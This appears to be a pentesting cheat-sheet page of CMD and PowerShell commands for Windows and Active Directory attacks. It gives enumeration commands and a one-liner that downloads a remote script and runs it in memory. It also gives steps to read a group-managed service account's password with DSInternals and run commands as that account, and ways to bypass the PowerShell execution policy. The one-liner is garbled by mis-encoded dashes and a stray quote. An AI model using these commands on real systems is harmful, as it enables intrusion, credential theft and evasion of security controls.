CMD and Powershell

dir . -att h
dir -Force
ls -Hidden (-Directory/-File)

Get-ChildItem env:
net user <user> /domain

powershell โ€“nop โ€“c "iex(New-Object Net.WebClient).DownloadString('http://..../.ps1'')"

With PrincipalsAllowedToRetrieveManagedPassword:
Get-ADServiceAccount -Identity 'srv-acc-name' -Properties *
// see PrincipalsAllowedToRetrieveManagedPassword : {CN=GROUP,OU=Sites,DC=DOMAIN,DC=DOMAIN}
// if you are in {CN..} you can retrieve the password
$managedpass = (Get-ADServiceAccount -Identity 'srv-acc-name' -Properties msDS-managedPassword).'msDS-managedPassword'
// Use DSInternals module
$pass = (ConvertFrom-ADManagedPasswordBlob $encpass).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential 'srv-acc-name', $pass
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
Set-ExecutionPolicy Bypass -Scope Process
Copy link
On this page
List hidden files
Basic enumeration
Execute PowerShell Script in Memory
AD Privilege Escalation
Service Accounts
Bypass PowerShell execution policy